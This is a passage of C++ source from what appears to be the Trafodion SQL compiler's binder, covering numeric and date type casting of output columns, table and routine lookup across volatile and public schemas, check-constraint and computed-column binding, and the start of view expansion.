(!naType.isSupportedType()) { // Unsupported types are displayed as strings of '#' to their display length ItemExpr *theRepeat = new (bindWA->wHeap()) Repeat(new (bindWA->wHeap()) SystemLiteral("#"), new (bindWA->wHeap()) SystemLiteral( naType.getDisplayLength( naType.getFSDatatype(), 0, naType.getPrecision(), naType.getScale(), 0))); theRepeat = theRepeat->bindNode(bindWA); col->setValueId(theRepeat->getValueId()); compExpr[i] = theRepeat->getValueId(); } else if ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) && (NOT bindWA->inViewDefinition()) && (NOT bindWA->inMVDefinition()) && (NOT bindWA->inCTAS()) && (naType.getTypeQualifier()== NA_DATETIME_TYPE && ((const DatetimeType &)naType).getSubtype() == DatetimeType::SUBTYPE_SQLDate) && (! CmpCommon::context()->getSqlmxRegress()) && (strcmp(ActiveSchemaDB()->getDefaults().getValue(OUTPUT_DATE_FORMAT), "ANSI") != 0)) { // Special1 DATE, return as YY/MM/DD ItemExpr * newChild = new (bindWA->wHeap()) Format(col->getValueId().getItemExpr(), "YY/MM/DD", FALSE); newChild = newChild->bindNode(bindWA); col->setValueId(newChild->getValueId()); compExpr[i] = newChild->getValueId(); } // For dynamic queries that are not part of a CREATE VIEW, change the returned type based on the // 'floattype' CQD. 
The default is Tandem type. // This is done to be upward compatible with // pre-R2 dynamic programs which are coded to expect tandem float // types in dynamic statements (describe, get descriptor, etc...). // The static statements are ok as we would convert from/to // tandem float hostvariables at runtime. // For the SELECT query that is part of a CREATE VIEW statement, do not convert to any // Tandem floating-point type because SQL/MX catalog manager does not support Tandem floating-point // and would give internal error. if ((naType.getTypeQualifier() == NA_NUMERIC_TYPE) && (CmpCommon::context()->GetMode() == STMT_DYNAMIC)) { NumericType &nTyp = (NumericType &)col->getValueId().getType(); if ((outputFloattypeIEEE && (nTyp.getFSDatatype() == REC_TDM_FLOAT32 || nTyp.getFSDatatype() == REC_TDM_FLOAT64)) || (! outputFloattypeIEEE && (nTyp.getFSDatatype() == REC_IEEE_FLOAT32 || nTyp.getFSDatatype() == REC_IEEE_FLOAT64))) { NAType *newTyp; if (outputFloattypeIEEE) { // convert to IEEE floating point. newTyp = new (bindWA->wHeap()) SQLDoublePrecision(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); } else { // convert to Tandem floating point. if (nTyp.getFSDatatype() == REC_IEEE_FLOAT32) newTyp = new (bindWA->wHeap()) SQLRealTdm(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); else newTyp = new (bindWA->wHeap()) SQLDoublePrecisionTdm(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); } ItemExpr *ie = col->getValueId().getItemExpr(); ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, newTyp, ITM_CAST); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return; col->setValueId(cast->getValueId()); compExpr[i] = cast->getValueId(); } } if (naType.getTypeQualifier() == NA_NUMERIC_TYPE && !((NumericType &)col->getValueId().getType()).binaryPrecision()) { NumericType &nTyp = (NumericType &)col->getValueId().getType(); ItemExpr * ie = col->getValueId().getItemExpr(); NAType *newTyp = NULL; Lng32 newPrec; Lng32 newScale; Lng32 oflow = -1; Lng32 bignumOflow = -1; NABoolean bignumIO = FALSE; if (CmpCommon::getDefault(BIGNUM_IO) == DF_ON) bignumIO = TRUE; // explicitely set to ON else if (CmpCommon::getDefault(BIGNUM_IO) == DF_OFF) bignumIO = FALSE; // explicitely set to OFF else if (CmpCommon::getDefault(BIGNUM_IO) == DF_SYSTEM) { if ((((NumericType &)col->getValueId().getType()).isBigNum()) && (((SQLBigNum &)col->getValueId().getType()).isARealBigNum())) bignumIO = TRUE; } if (CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED) == MAX_HARDWARE_SUPPORTED_SIGNED_NUMERIC_PRECISION) bignumIO = FALSE; if (bignumIO) bignumOflow = nTyp.getPrecision() - (Lng32)CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED); else { if (nTyp.isSigned()) oflow = nTyp.getPrecision() - MAX_HARDWARE_SUPPORTED_SIGNED_NUMERIC_PRECISION; else oflow = nTyp.getPrecision() - MAX_HARDWARE_SUPPORTED_UNSIGNED_NUMERIC_PRECISION; } if ((bignumOflow > 0) || (oflow > 0)) { if (bignumOflow > 0) { newPrec = (Lng32)CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED); Lng32 orgMagnitude = nTyp.getPrecision() - nTyp.getScale(); // set the newScale // IF there is overflow in magnitude set the scale to 0. // ELSE set the accomodate the magnitude part and truncate the scale newScale = (orgMagnitude >= newPrec) ? 
0 : newPrec - orgMagnitude ; if (newScale > newPrec) { *CmpCommon::diags() << DgSqlCode(-3015) << DgInt0(newScale) << DgInt1(newPrec); bindWA->setErrStatus(); return; } newTyp = new (bindWA->wHeap()) SQLBigNum(newPrec, newScale, ((SQLBigNum &)col->getValueId().getType()).isARealBigNum(), nTyp.isSigned(), nTyp.supportsSQLnull(), NULL); } else if (oflow > 0) { // If it's not a computed expr, but a column w/ a legal type, re-loop if (col->getValueId().getNAColumn(TRUE/*don't assert*/)) { //CMPASSERT(!nTyp.isInternalType()); //continue; } CMPASSERT(nTyp.isInternalType()); OperatorTypeEnum op = ie->origOpType(); CMPASSERT(op != NO_OPERATOR_TYPE && // Init'd correctly? op != ITM_RENAME_COL && // Expect these to have op != ITM_REFERENCE); // been bound, vanished. ItemExpr *ie2 = ie; while (op == ITM_INSTANTIATE_NULL) { ie2 = ie2->child(0).getPtr(); op = ie2->origOpType(); } // ANSI 6.5 SR 7 - 9: aggregates must be exact if column is exact. newPrec = MAX_NUMERIC_PRECISION; Lng32 orgMagnitude = (nTyp.getMagnitude() + 9) / 10; // set the newScale // IF there is overflow in magnitude set the scale to 0. // ELSE set the accomodate the magnitude part and truncate the scale newScale = (orgMagnitude >= newPrec) ? 0 : newPrec - orgMagnitude ; // Based on the CQD set the scale to MIN value. // CQD specifies the MIN scale that has to be preserved in case // of overflow. NADefaults &defs = ActiveSchemaDB()->getDefaults(); Lng32 minScale = defs.getAsLong(PRESERVE_MIN_SCALE); newScale = MAXOF(minScale, newScale); if (op == ITM_SUM || op == ITM_AVG) { // AVG = DIVIDE( SUM(), COUNT() ) ItemExpr *tmp = (op == ITM_SUM) ? ie2 : ie2->child(0).getPtr(); // // Now that we support OLAP functions, this may be // a pointer to an ITM_NOTCOVERED node. If so, we // need to check its child(0) node rather than // the ITM_NOTCOVERED node. // if (tmp->getOperatorType() == ITM_NOTCOVERED ) tmp = (Aggregate *)(ItemExpr *)tmp->child(0); CMPASSERT(tmp->isAnAggregate()); Aggregate *sum = (Aggregate *)tmp; ItemExpr *arg = (sum->getOriginalChild()) ? sum->getOriginalChild() : sum->child(0).getPtr(); if (arg->getValueId() == NULL_VALUE_ID) arg = sum->child(0).getPtr(); CMPASSERT(arg->getValueId() != NULL_VALUE_ID); Lng32 needScale = arg->getValueId().getType().getScale(); if (needScale > newPrec) needScale = newPrec; if (newScale < needScale || op == ITM_SUM) // ANSI 6.5 SR 9 b + c newScale = needScale; } if (newScale == 0) newTyp = new (bindWA->wHeap()) SQLLargeInt(TRUE, // hardware only supports signed nTyp.supportsSQLnull()); else newTyp = new (bindWA->wHeap()) SQLNumeric(sizeof(Int64), newPrec, newScale, nTyp.isSigned(), nTyp.supportsSQLnull()); } // overflow ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, newTyp, ITM_CAST, TRUE/*checkForTrunc*/); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return; if (!col->getColRefNameObj().getColName().isNull()) { // We get here via CREATE VIEW v AS SELECT (expr op expr) AS nam ...; // ColumnDesc::setValueId() makes the RETDesc's XCNM inconsistent -- // but this is ok because name lookup over this XCNM doesn't happen // after the point we've gotten to here -- // a) if caller is StmtDDLCreateView::bindNode via RelRoot::bindNode, // there's no further lookup at all; // b) if caller is bindView(), then thanks to the way RenameTable // and RETDesc work, the inconsistent XCNM is not consulted // so we don't have to worry about this issue ... (for now anyhow!) 
} col->setValueId(cast->getValueId()); compExpr[i] = cast->getValueId(); } // overflow (bignum or regular) } // numeric } // loop over cols in RETDesc } // castComputedColumnsToAnsiTypes() desc_struct *generateSpecialDesc(const CorrName& corrName) { desc_struct * desc = NULL; if (corrName.getSpecialType() == ExtendedQualName::VIRTUAL_TABLE) { if (corrName.getQualifiedNameObj().getObjectName() == ExplainFunc::getVirtualTableNameStr()) { ExplainFunc ef; desc = ef.createVirtualTableDesc(); } else if (corrName.getQualifiedNameObj().getObjectName() == StatisticsFunc::getVirtualTableNameStr()) { StatisticsFunc sf; desc = sf.createVirtualTableDesc(); } } return desc; } // generateSpecialDesc() // ----------------------------------------------------------------------- // member functions for class BindWA // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu /* static NABoolean checkForReservedObjectName(QualifiedName &inName) { if ((inName.getCatalogName() == "NEO") && (inName.getSchemaName() == "PUBLIC_ACCESS_SCHEMA") && (inName.getObjectName() == "_MAINTAIN_CONTROL_INFO_")) { return TRUE; } return FALSE; } */ // LCOV_EXCL_STOP NARoutine *BindWA::getNARoutine ( const QualifiedName &name ) { NARoutineDBKey key(name, wHeap()); NARoutine * naRoutine = getSchemaDB()->getNARoutineDB()->get(this, &key); if (!naRoutine) { desc_struct *udfMetadata = NULL; CmpSeabaseDDL cmpSBD(STMTHEAP); udfMetadata = cmpSBD.getSeabaseRoutineDesc( name.getCatalogName(), name.getSchemaName(), name.getObjectName()); if (!udfMetadata) return NULL; NAHeap *routineHeap; if (getSchemaDB()->getNARoutineDB()->cachingMetaData()) { const Lng32 size = 16 * 1024; // The initial size routineHeap = new CTXTHEAP NAHeap("NARoutine Heap", (NAHeap *)CTXTHEAP, size); routineHeap->setJmpBuf(CmpInternalErrorJmpBufPtr); } else routineHeap=CmpCommon::statementHeap(); Int32 errors=0; naRoutine = new (routineHeap) NARoutine(name, udfMetadata, this, errors, routineHeap); if ( NULL == naRoutine || errors != 0) { setErrStatus(); return NULL; } // Add NARoutine to the NARoutineDB cache. if (getSchemaDB()->getNARoutineDB()->cachingMetaData()) getSchemaDB()->getNARoutineDB()->put(naRoutine); } return naRoutine; } NATable *BindWA::getNATable(CorrName& corrName, NABoolean catmanCollectTableUsages, // default TRUE desc_struct *inTableDescStruct) // default NULL { BindWA *bindWA = this; // for coding convenience NATable * table = NULL; // Search in volatile schema first. If not found, search in regular cat/sch. NABoolean volatileTableFound = FALSE; NAString userName; if ((CmpCommon::context()->sqlSession()->volatileSchemaInUse()) && (! inTableDescStruct) && (corrName.getSpecialType() != ExtendedQualName::VIRTUAL_TABLE)) { CorrName newCorrName = CmpCommon::context()->sqlSession()->getVolatileCorrName (corrName); if (bindWA->errStatus()) return NULL; //get NATable from cache table = bindWA->getSchemaDB()->getNATableDB()-> get(newCorrName, bindWA, inTableDescStruct); if (!table) { // now search in regular cat/sch. // clear diags area. CmpCommon::diags()->clear(); bindWA->resetErrStatus(); } else { NABoolean isValid = CmpCommon::context()->sqlSession()->validateVolatileCorrName (corrName); // if this table is found in volatile schema, then // make sure it is a volatile table. if ((isValid) && (NOT table->isVolatileTable())) { *CmpCommon::diags() << DgSqlCode(-4190) << DgTableName(table->getTableName(). 
getQualifiedNameAsAnsiString(TRUE)); bindWA->setErrStatus(); return NULL; } if (isValid) { newCorrName.setIsVolatile(TRUE); corrName = newCorrName; } else { // table was found in the volatile schema but it is // not a valid volatile name. // Look for it in regular schema. table = NULL; CmpCommon::diags()->clear(); bindWA->resetErrStatus(); // remember that volatile table was found so we // can generate a better error message later. volatileTableFound = TRUE; } } } if (! table) { // Expand the table (base table, view, etc.) name with // the default catalog and schema parts if the specified // table name does not include these parts. // This method will also first apply any prototype value (from a host var) // into the corrName's qualifiedName. // NABoolean catNameSpecified = (NOT corrName.getQualifiedNameObj().getCatalogName().isNull()); NABoolean schNameSpecified = (NOT corrName.getQualifiedNameObj().getSchemaName().isNull()); // try PUBLIC SCHEMA only when no schema was specified // and CQD PUBLIC_SCHEMA_NAME is specified NAString publicSchema = ""; CmpCommon::getDefault(PUBLIC_SCHEMA_NAME, publicSchema, FALSE); ComSchemaName pubSchema(publicSchema); NAString pubSchemaIntName = ""; if ( !schNameSpecified && !pubSchema.getSchemaNamePart().isEmpty() ) { pubSchemaIntName = pubSchema.getSchemaNamePart().getInternalName(); } corrName.applyDefaults(bindWA, bindWA->getDefaultSchema()); if (bindWA->errStatus()) return NULL; // prototype value parse error // override schema if ( ( overrideSchemaEnabled() ) // not volatile table && ( ! volatileTableFound ) ) { doOverrideSchema(corrName); } // if DEFAULT_SCHEMA_ACCESS_ONLY, can only access default and public schemas if (corrName.getSpecialType()==ExtendedQualName::NORMAL_TABLE) // NORMAL_TABLE also covers synonym, view and MV { if (violateAccessDefaultSchemaOnly(corrName.getQualifiedNameObj())) return NULL; } // make sure that schema name is not a VOLATILE SCHEMA if ((! bindWA->inDDL()) || ((bindWA->inViewDefinition()) || (bindWA->inMVDefinition()))) { if (! CmpCommon::context()->sqlSession()->validateVolatileQualifiedSchemaName (corrName.getQualifiedNameObj())) { bindWA->setErrStatus(); return NULL; } } //get NATable (from cache or from metadata) table = bindWA->getSchemaDB()->getNATableDB()-> get(corrName, bindWA, inTableDescStruct); //try the public schema if not found if ( !table && !pubSchemaIntName.isNull() ) { CorrName pCorrName(corrName); pCorrName.getQualifiedNameObj().setSchemaName(pubSchemaIntName); if ( !pubSchema.getCatalogNamePart().isEmpty() ) { pCorrName.getQualifiedNameObj().setCatalogName( pubSchema.getCatalogNamePart().getInternalName()); } bindWA->resetErrStatus(); table = bindWA->getSchemaDB()->getNATableDB()-> get(pCorrName, bindWA, inTableDescStruct); if ( !bindWA->errStatus() && table ) { // if found in public schema, do not show previous error // and replace corrName CmpCommon::diags()->clear(); corrName.getQualifiedNameObj().setCatalogName( pCorrName.getQualifiedNameObj().getCatalogName()); corrName.getQualifiedNameObj().setSchemaName( pCorrName.getQualifiedNameObj().getSchemaName()); } } // move to here, after public schema try because BindUtil_CollectTableUsageInfo // saves table info for mv definition, etc. // Conditionally (usually) do stuff for Catalog Manager (static func above). 
if (catmanCollectTableUsages) if (corrName.getSpecialType() != ExtendedQualName::TRIGTEMP_TABLE) BindUtil_CollectTableUsageInfo(bindWA, corrName); if (!table) { if (volatileTableFound) { if ((CmpCommon::diags()->mainSQLCODE() == -1003) && (NOT catNameSpecified)) { // the name is in true USER_NAME.VOL_TAB_NAME form // where the USER_NAME doesn't match current name. // Clear errors and return an appropriate message. CmpCommon::diags()->clear(); CmpCommon::context()->sqlSession()->validateVolatileCorrName (corrName); bindWA->setErrStatus(); } } return NULL; } } // if a volatile table is found, make sure that volatile schema is in // use and volatile tables are allowed. if ((table) && (table->isVolatileTable())) { // set volatile table indication in table's tablename ((QualifiedName&)(table->getTableName())).setIsVolatile(TRUE); } // For now, don't allow access through the Trafodion external name created for // native HIVE or HBASE objects unless the allowExternalTables flag is set. // allowExternalTables is set for drop table and SHOWDDL statements. // TDB - may want to merge the Trafodion version with the native version. if ((table) && table->isExternalTable() && (! bindWA->allowExternalTables())) { *CmpCommon::diags() << DgSqlCode(-4258) << DgTableName(table->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // If the table is an external table and has an associated native table, // check to see if the external table structure still matches the native table. // If not, return an error if ((table) && table->isExternalTable()) { NAString adjustedName =ComConvertTrafNameToNativeName (table->getTableName().getCatalogName(), table->getTableName().getUnqualifiedSchemaNameAsAnsiString(), table->getTableName().getUnqualifiedObjectNameAsAnsiString()); // Get a description of the associated Trafodion table Int32 numNameParts = 3; QualifiedName adjustedQualName(adjustedName,numNameParts,STMTHEAP, bindWA); CorrName externalCorrName(adjustedQualName, STMTHEAP); NATable *nativeNATable = bindWA->getSchemaDB()->getNATableDB()-> get(externalCorrName, bindWA, inTableDescStruct); // Compare column lists // TBD - return what mismatches if ( nativeNATable && !(table->getNAColumnArray() == nativeNATable->getNAColumnArray())) { *CmpCommon::diags() << DgSqlCode(-3078) << DgString0(adjustedName) << DgTableName(table->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); nativeNATable->setRemoveFromCacheBNC(TRUE); return NULL; } } HostVar *proto = corrName.getPrototype(); if (proto && proto->isPrototypeValid()) corrName.getPrototype()->bindNode(bindWA); // This test is not "inAnyConstraint()" because we DO want to increment // the count for View With Check Option constraints. if (!getCurrentScope()->context()->inTableCheckConstraint() && !getCurrentScope()->context()->inRIConstraint()) table->incrReferenceCount(); if (table) OSIM_captureTableOrView(table); return table; } // BindWA::getNATable() static TableDesc *createTableDesc2(BindWA *bindWA, const NATable *naTable, CorrName &corrName, Hint *hint) { // Allocate a base table descriptor. // TableDesc *tdesc = new (bindWA->wHeap()) TableDesc(bindWA, naTable, corrName); // Insert the table name into the XTNM. // bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, corrName); if (bindWA->errStatus()) return NULL; // For each NAColumn, allocate a BaseColumn, bind the BaseColumn, and // add the ValueId to the TableDesc. 
// CollIndex i = 0; for (i = 0; i < naTable->getColumnCount(); i++) { BaseColumn *baseCol = new (bindWA->wHeap()) BaseColumn(tdesc, i); baseCol->bindNode(bindWA); if (bindWA->errStatus()) return NULL; ValueId valId = baseCol->getValueId(); tdesc->addToColumnList(valId); } // set primary key for this table tdesc->setPrimaryKeyColumns(); // For each index, create an IndexDesc. // NAString indexChoice; NADefaults &defs = ActiveSchemaDB()->getDefaults(); defs.getValue(HIDE_INDEXES,indexChoice); for (i = 0; i < naTable->getIndexList().entries(); i++) { NAFileSet *nfs=naTable->getIndexList()[i]; IndexDesc *idesc = new (bindWA->wHeap()) IndexDesc(tdesc, nfs, bindWA->currentCmpContext()); if (naTable->getClusteringIndex()->getFileSetName() == idesc->getIndexName()) { tdesc->setClusteringIndex(idesc); idesc->markAsClusteringIndex(); } if(indexChoice.compareTo("NONE") ==0 OR indexChoice.compareTo("VERTICAL") ==0 OR (indexChoice.compareTo("KEYINDEXES") ==0 AND tdesc->isKeyIndex(idesc)) OR naTable->getClusteringIndex()->getFileSetName() == nfs->getFileSetName()) { tdesc->addIndex(idesc); // implementation of optimizer hints if (hint AND hint->hasIndexHint (idesc->getNAFileSet()->getExtFileSetName())) { tdesc->addHintIndex(idesc); } if (idesc->isUniqueIndex() ) tdesc->addUniqueIndex(idesc); } else { delete idesc; } } // For each vertical partition, create an IndexDesc. // Add this VP to the list of VPs for the TableDesc. for (i = 0; i < naTable->getVerticalPartitionList().entries(); i++) { if(indexChoice.compareTo("NONE") ==0 OR indexChoice.compareTo("INDEXES")==0 OR indexChoice.compareTo("KEYINDEXES")==0) { IndexDesc *idesc = new (bindWA->wHeap()) IndexDesc(tdesc, naTable->getVerticalPartitionList()[i], bindWA->currentCmpContext()); tdesc->addVerticalPartition(idesc); } } // Allocate a RETDesc, attach it to the BindScope. // bindWA->getCurrentScope()->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, tdesc)); // Do not include tables-referenced-in-a-constraint (when/if we allow them) // in the view-contains-table list; if we did include them, then // TableViewUsageList::getViewsOnTable() would give wrong results // for where it's used to prevent the Halloween problem. // // If we end up needing this extra info, I advise either a separate list, // or a new field in TableViewUsage indicating usage type (containment // versus reference), enhancing method getViewsOnTable() accordingly. // if (!bindWA->getCurrentScope()->context()->inAnyConstraint()) bindWA->tableViewUsageList().insert(new (bindWA->wHeap()) TableViewUsage( tdesc->getCorrNameObj().getQualifiedNameObj(), tdesc->getCorrNameObj().getSpecialType(), naTable->getViewText() != NULL, bindWA->viewCount())); return tdesc; } // static createTableDesc2() TableDesc *BindWA::createTableDesc(const NATable *naTable, CorrName &corrName, NABoolean catmanCollectUsages, Hint *hint) { BindWA *bindWA = this; // for coding convenience TableDesc *tdesc = createTableDesc2(bindWA, naTable, corrName, hint); if (bindWA->errStatus()) return NULL; // Now bind any table check constraints and attach them to our new tdesc. // These constraints must be processed for UPDATE and INSERT. // DELETEs must clear them; see Delete::bindNode. // // For SELECTs, NOT NULL constraints are marked on the NAColumn::allowsNulls // allowing more elaborate Transformations. For SELECTs, other types of // constraints are not currently used, but could be in future, // to optimize by providing additional predicate/selectivity info. 
// // ## We ought to write some regression test cases like // INSERT INTO T (SELECT * FROM S) -- T's constraints yes, S irrelevant // INSERT INTO T VALUES ((SELECT A FROM S WHERE..),..) // INSERT INTO V3 ... -- underlying basetbl's constrts yes // -- V3 atop VA atop T: let the views be // -- WITH CHECK OPTION, then viewpred-constrt yes // const CheckConstraintList &ccl = naTable->getCheckConstraints(); if (ccl.entries()) { // Table check constraint text is stored in the metadata tables // with the underlying table/view name (e.g. "CHECK (C.S.T.COL > 0)"), // whereas any correlation name in a query // (e.g. "SELECT * FROM C.S.T FOO WHERE COL < 10") // is irrelevant to the persistent constraint text -- // when binding the check constraint, we want to find column C.S.T.COL, // while the TableDesc/RETDesc just built only exposes the column // under names COL and FOO.COL. // // So, if we have a correlation name, we must: // - rename our TableDesc (rename FOO to C.S.T) // - create a temporary table name scope for C.S.T that will hide FOO // - construct a temporary RETDesc with names COL, T.COL, S.T.COL, C.S.T.COL // but the same ValueId's they had before // // Then we bind the constraints using that RETDesc for name lookups. // // Then for the non-empty correlation, reset/undo the temporary stuff. RETDesc *savedRETDesc = NULL; NABoolean corrNameIsNonEmpty = !corrName.getCorrNameAsString().isNull(); CorrName synonymReferenceCorrName; if(naTable->getIsSynonymTranslationDone()){ QualifiedName baseQualifiedName(naTable->getSynonymReferenceName(),3); synonymReferenceCorrName=baseQualifiedName; } if ((corrNameIsNonEmpty) || (naTable->getIsSynonymTranslationDone())) { CorrName baseCorrName; baseCorrName = (naTable->getIsSynonymTranslationDone()) ? synonymReferenceCorrName : naTable->getTableName(); tdesc->setCorrName(baseCorrName); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, baseCorrName); if (bindWA->errStatus()) return NULL; savedRETDesc = bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, tdesc)); if (bindWA->errStatus()) return NULL; } for (CollIndex i = 0; i < ccl.entries(); i++) { ItemExpr *constraintPred = bindCheckConstraint(bindWA, ccl[i], naTable, catmanCollectUsages); if (constraintPred) tdesc->addCheckConstraint(bindWA, naTable, ccl[i], constraintPred); else if (bindWA->errStatus()) break; } if ((corrNameIsNonEmpty) || (naTable->getIsSynonymTranslationDone())){ // reset temporaries tdesc->setCorrName(corrName); delete bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(savedRETDesc); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); } } // check constraint processing required // if the table contains computed columns, bind the expressions to compute the columns for (CollIndex c = 0; c < naTable->getColumnCount(); c++) { NAColumn *nac = tdesc->getNATable()->getNAColumnArray()[c]; if (nac->isComputedColumn()) { ItemExpr *computedColumnExpr = NULL; Parser parser(bindWA->currentCmpContext()); // parse the text stored in the NAColumn computedColumnExpr = parser.getItemExprTree( nac->getComputedColumnExprString(), str_len(nac->getComputedColumnExprString()), CharInfo::UTF8); if (computedColumnExpr) { ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); bindWA->setNameLocListPtr(NULL); bindWA->getCurrentScope()->context()->inComputedColumnExpr() = TRUE; computedColumnExpr = computedColumnExpr->bindNode(bindWA); 
bindWA->setNameLocListPtr(saveNameLocList); bindWA->getCurrentScope()->context()->inComputedColumnExpr() = FALSE; if (bindWA->errStatus()) { delete computedColumnExpr; computedColumnExpr = NULL; return NULL; } else { // Store the expression tree in the base column ((BaseColumn *) tdesc->getColumnList()[c].getItemExpr())-> setComputedColumnExpr(computedColumnExpr->getValueId()); } } } } return tdesc; } // BindWA::createTableDesc() // QSTUFF - helper for BindWA::bindView. static void propagateDeleteAndStream(RelExpr *re, GroupAttributes *ga) { if (ga->isEmbeddedUpdateOrDelete()) re->getGroupAttr()->setEmbeddedIUD( ga->getEmbeddedIUD()); if (ga->isStream()) re->getGroupAttr()->setStream(TRUE); if (ga->isSkipInitialScan()) re->getGroupAttr()->setSkipInitialScan(TRUE); Int32 arity = re->getArity(); for (Int32 i = 0; i < arity; i++) { if (re->child(i)) propagateDeleteAndStream(re->child(i), ga); } } RelExpr *BindWA::bindView(const CorrName &viewName, const NATable *naTable, const StmtLevelAccessOptions &accessOptions, ItemExpr *predicate, GroupAttributes *groupAttrs, NABoolean catmanCollectUsages) { BindWA *bindWA = this; // for coding convenience CMPASSERT(viewName.getQualifiedNameObj() == naTable->getTableName()); NABoolean inViewExpansion = bindWA->setInViewExpansion(TRUE); // QSTUFF // set a flag for overrride_schema //if (overrideSchemaEnabled()) bindWA->getCurrentScope()->setInViewExpansion(TRUE); if (!bindWA->getCurrentScope()->context()->inAnyConstraint()) bindWA->tableViewUsageList().insert(new (bindWA->wHeap()) TableViewUsage( viewName.getQualifiedNameObj(), viewName.getSpecialType(), TRUE/*isView*/, bindWA->viewCount())); // save the current parserflags setting ULng32 savedParserFlags = Get_SqlParser_Flags (0xFFFFFFFF); // allow funny characters in the tablenames used in the select list. // This enables views to be created on 'internal' secret table // so they could be accessed. // At view creation time, the caller still need to set this // parserflag from the sql interface(mxci, etc) otherwise the view // creation will fail. Since parserflags can only be set by super // users, the view with special tablenames could only have been created // by a super user. Set_SqlParser_Flags(ALLOW_FUNNY_IDENTIFIER); // Parse the view text. // // isolation level and order by are allowed in create view, if // the corresponding cqds are set. // These cqds are only valid during 'create view' time. Once the views // are created, we don't need to look at them. // During view expansion when we reach this method, turn the cqds on if // they are not already on, so parser doesn't return an error. // Reset them back, if they were set here. 
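  // For example (an illustrative case; names are made up): a view created as
  //    CREATE VIEW V AS SELECT A, B FROM T ORDER BY A;
  // while ALLOW_ORDER_BY_IN_CREATE_VIEW was ON has that ORDER BY in its stored
  // view text.  If the view is expanded in a session where the cqd is OFF,
  // the parseDML() call below would reject the stored text, so the cqd is
  // turned ON here temporarily and restored right after parsing.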
NABoolean allowIsolationLevelWasSet = FALSE; NABoolean allowOrderByWasSet = FALSE; if (CmpCommon::getDefault(ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW) == DF_OFF) { allowIsolationLevelWasSet = TRUE; NAString op("ON"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW", op, FALSE); } if (CmpCommon::getDefault(ALLOW_ORDER_BY_IN_CREATE_VIEW) == DF_OFF) { allowOrderByWasSet = TRUE; NAString op("ON"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ORDER_BY_IN_CREATE_VIEW", op, FALSE); } Parser parser(bindWA->currentCmpContext()); ExprNode *viewTree = parser.parseDML(naTable->getViewText(), naTable->getViewLen(), naTable->getViewTextCharSet()); // Restore parser flags settings to what they originally were Set_SqlParser_Flags (savedParserFlags); if (allowIsolationLevelWasSet) { NAString op("OFF"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW", op, FALSE); } if (allowOrderByWasSet) { NAString op("OFF"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ORDER_BY_IN_CREATE_VIEW", op, FALSE); } if (NOT viewTree) { bindWA->setErrStatus(); return NULL; } // Remove the StmtQuery node. // Clear the root flag in the RelRoot node since this not the topmost // RelRoot in the query tree. // CMPASSERT(viewTree->getOperatorType() == STM_QUERY); RelExpr *queryTree = viewTree->castToStatementExpr()->getQueryExpression(); CMPASSERT(queryTree->getOperatorType() == REL_ROOT); ((RelRoot *)queryTree)->setRootFlag(FALSE); CMPASSERT(queryTree->getChild(0)->getOperatorType() == REL_DDL); StmtDDLCreateView *createViewTree = ((DDLExpr *)(queryTree->getChild(0)))-> getDDLNode()->castToStmtDDLNode()->castToStmtDDLCreateView(); CMPASSERT(createViewTree); queryTree = createViewTree->getQueryExpression(); CMPASSERT(queryTree->getOperatorType() == REL_ROOT); ((RelRoot *)queryTree)->setRootFlag(FALSE); RelRoot *viewRoot = (RelRoot *)queryTree; // save for add'l binding below ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); // This was put here for Genesis 10-980217-0467. // Now with the fix for 10-980408-5149, we even more strongly need to bypass // or ignore any accessOpts from the view, for a consistent access model. if ((CmpCommon::getDefault(ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW) == DF_OFF) || (viewRoot->accessOptions().accessType() == ACCESS_TYPE_NOT_SPECIFIED_)) { // if cqd is set and view options were explicitely specified, // then do not overwrite it with accessOptions. viewRoot->accessOptions() = accessOptions; } // Set the WCO context (Genesis 10-971112-7028 + 10-990518-8420): // If this view is WITH CHECK OPTION, then all views below it acquire // check-option-ness, per Ansi 11.19 GR 9-11a // (we implement only CASCADED -- see further notes later on in this func); // if some view above this one is WCO, then this view effectively is too, // regardless of its getViewCheck() value. // Genesis 10-990518-8420 fix in particular: // with-check-option views of the form // SELECT..FROM(SELECT..WHERE p1)REN WHERE p2 // were emitting a bind error on pred p1, and ignoring pred p2! // NABoolean topmostViewWithCheckOption = FALSE; if (naTable->getViewCheck() && bindWA->getCurrentScope()->context()->inUpdateOrInsert() && !bindWA->inViewWithCheckOption()) { topmostViewWithCheckOption = TRUE; bindWA->inViewWithCheckOption() = naTable; } // QSTUFF // Give the new query tree the pubsub group attrs before // binding, so that binder checks are applied to the new tree. 
